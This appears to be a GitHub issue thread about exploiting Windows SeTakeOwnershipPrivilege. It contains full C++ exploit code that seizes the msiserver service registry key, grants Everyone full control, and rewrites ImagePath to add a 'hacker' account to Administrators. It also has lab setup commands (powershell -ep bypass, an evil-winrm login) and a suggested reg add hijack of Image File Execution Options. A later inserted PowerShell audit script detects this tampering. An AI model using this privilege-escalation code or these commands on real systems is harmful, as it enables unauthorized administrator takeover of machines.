
Exploiting SeTakeOwnershipPrivilege

Open zusda opened this issue 2 years ago • 4 comments

Could you write up how SeTakeOwnershipPrivilege is exploited? I used the restore code on a target machine I set up myself, and it always fails with access denied.

// takeOwnerShip2.cpp : This file contains the "main" function. Program execution begins and ends here.
//
#include <Windows.h>
#include <winternl.h>
#include <sddl.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <string>
#include <tchar.h>
#include <AclAPI.h>
#include<iostream>

PVOID
GetInfoFromToken(HANDLE current_token, TOKEN_INFORMATION_CLASS tic)
{
	DWORD n;
	PVOID data;

	if (!GetTokenInformation(current_token, tic, 0, 0, &n) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
		return 0;

	data = (PVOID)malloc(n);

	if (GetTokenInformation(current_token, tic, data, n, &n))
		return data;
	else
		free(data);

	return 0;
}

int main()
{
	wchar_t infile[] = L"MACHINE\\SYSTEM\\CurrentControlSet\\Services\\msiserver";
	HANDLE current_token;
	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &current_token);
	PTOKEN_USER user = (PTOKEN_USER)GetInfoFromToken(current_token, TokenUser);
	PSID UserSid = (LPTSTR)user->User.Sid;
	DWORD dwRes = SetNamedSecurityInfoW(infile, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, UserSid, NULL, NULL, NULL);

	PSID pSIDEveryone = NULL;
	PACL pACL;
	SID_IDENTIFIER_AUTHORITY SIDAuthWorld = SECURITY_WORLD_SID_AUTHORITY;
	AllocateAndInitializeSid(&SIDAuthWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pSIDEveryone);
	EXPLICIT_ACCESS ea[1];
	ZeroMemory(ea, sizeof(ea)); // leave no uninitialised Trustee fields for SetEntriesInAcl
	ea[0].grfAccessPermissions = KEY_ALL_ACCESS;
	ea[0].grfAccessMode = SET_ACCESS;
	ea[0].grfInheritance = NO_INHERITANCE;
	ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
	ea[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
	ea[0].Trustee.ptstrName = (LPTSTR)pSIDEveryone;
	SetEntriesInAcl(1, ea, NULL, &pACL);


	//wchar_t infile[] = L"SYSTEM\\CurrentControlSet\\Services\\msiserver";
	dwRes = SetNamedSecurityInfoW(infile, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL);
	if (dwRes != ERROR_SUCCESS)
		printf("[-] Failed to set DACL: %d\n", dwRes);
	else
		printf("[!] Success!\n");


	HKEY hKey;
	LONG lResult;
	lResult = RegCreateKeyExA(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\msiserver",
		0,
		NULL,
		REG_OPTION_BACKUP_RESTORE,
		KEY_SET_VALUE,
		NULL,
		&hKey,
		NULL);
	std::cout << "RegCreateKeyExA result: " << lResult << std::endl;
	if (lResult != 0) {
		exit(0);
	}

	//HKEY hk = HKEY("SYSTEM\\CurrentControlSet\\Services\\msiserver");
	std::string buffer = "cmd.exe /c net localgroup administrators hacker /add";
	LONG stat = RegSetValueExA(hKey, "ImagePath", 0,
		REG_EXPAND_SZ,
		(const BYTE*)buffer.c_str(),
		buffer.length() + 1);
	std::cout << "RegSetValueExA result: " << stat << std::endl;
	if (stat != 0) {
		exit(0);
	}
}


zusda avatar May 09 '22 09:05 zusda

https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp

Does this work in your environment?

3gstudent avatar May 16 '22 01:05 3gstudent

It works, but all it does is obtain permission on one registry entry. I then added the SeRestore exploitation code (the part of the code you posted under the `// exploit it via restore` comment), but it errors out saying there is no permission to access, even though when I do it manually I really do get the permission.

Later, for the exploitation part, I used the Windows built-in reg.exe instead and successfully modified the contents of the registry entry.

My environment is Win10. Setup commands:

powershell -ep bypass

Import-Module carbon

Grant-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege

Test-CPrivilege -Identity aarti -Privilege SeTakeOwnershipPrivilege

Then log in via WinRM:

evil-winrm -i 10.254.1.102 -u aarti -p "123"


zusda avatar May 16 '22 09:05 zusda
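A defender-side audit for the setup described in the post above, added here as an example and not code from this issue or the 3gstudent repository: it lists which accounts hold SeTakeOwnershipPrivilege on the host (the right that Grant-CPrivilege assigned to aarti) and flags service keys under HKLM\SYSTEM\CurrentControlSet\Services whose owner or DACL shows the take-ownership-then-rewrite pattern. It assumes an elevated PowerShell session, since secedit and Get-Acl on service keys need administrator rights; the file name under $env:TEMP is an arbitrary choice.

```powershell
# Added audit example (not from this issue or the 3gstudent repo). Run elevated on Windows 10+.

# 1. Which accounts hold SeTakeOwnershipPrivilege? secedit exports the local policy as an
#    .inf whose [Privilege Rights] section lists holders as *SID entries.
$cfg = Join-Path $env:TEMP 'user_rights_audit.inf'   # arbitrary temp file name
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
$line = Get-Content -Path $cfg | Where-Object { $_ -match '^SeTakeOwnershipPrivilege\s*=' }
Remove-Item -Path $cfg -ErrorAction SilentlyContinue

$holders = @()
if ($line) {
    foreach ($entry in (($line -split '=', 2)[1] -split ',')) {
        $entry = $entry.Trim()
        if ($entry.StartsWith('*')) {
            try {
                $sid = New-Object -TypeName System.Security.Principal.SecurityIdentifier -ArgumentList $entry.Substring(1)
                $entry = $sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch { }   # keep unresolvable SIDs as-is
        }
        $holders += $entry
    }
}
Write-Host "Accounts holding SeTakeOwnershipPrivilege: $($holders -join ', ')"
# By default only BUILTIN\Administrators holds it; any other holder (such as 'aarti' above) is a finding.
$unexpected = $holders | Where-Object { $_ -ne 'BUILTIN\Administrators' }
if ($unexpected) { Write-Warning "Unexpected holders of SeTakeOwnershipPrivilege: $($unexpected -join ', ')" }

# 2. Service keys: the owner should be SYSTEM, TrustedInstaller or Administrators, and no
#    service key should grant Everyone full control. Both change when ownership is taken
#    and the DACL rewritten on a key such as msiserver.
$expectedOwners = @('NT AUTHORITY\SYSTEM', 'NT SERVICE\TrustedInstaller', 'BUILTIN\Administrators')
$full = [System.Security.AccessControl.RegistryRights]::FullControl
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
    $acl = Get-Acl -Path $_.PSPath -ErrorAction SilentlyContinue
    if (-not $acl) { return }   # skip keys we cannot read
    if ($expectedOwners -notcontains $acl.Owner) {
        Write-Warning "$($_.PSChildName): owner is $($acl.Owner)"
    }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and $ace.IdentityReference.Value -eq 'Everyone' -and
            (($ace.RegistryRights -band $full) -eq $full)) {
            $image = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).ImagePath
            Write-Warning "$($_.PSChildName): Everyone has FullControl; ImagePath = '$image'"
        }
    }
}
```

Feed the warnings into whatever baseline or SIEM you use; an ImagePath that no longer points at a service binary is the indicator to act on.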

Can I understand it this way:

The code at https://github.com/3gstudent/Homework-of-C-Language/blob/master/EnableSeTakeOwnershipPrivilege.cpp works, and afterwards you can run, with low privileges, reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v takeownership /t REG_SZ /d "C:\\Windows\\System32\\calc.exe"

You want to implement the reg add operation in the .cpp, but it failed?

3gstudent avatar May 17 '22 07:05 3gstudent

Yes.


zusda avatar Oct 11 '22 07:10 zusda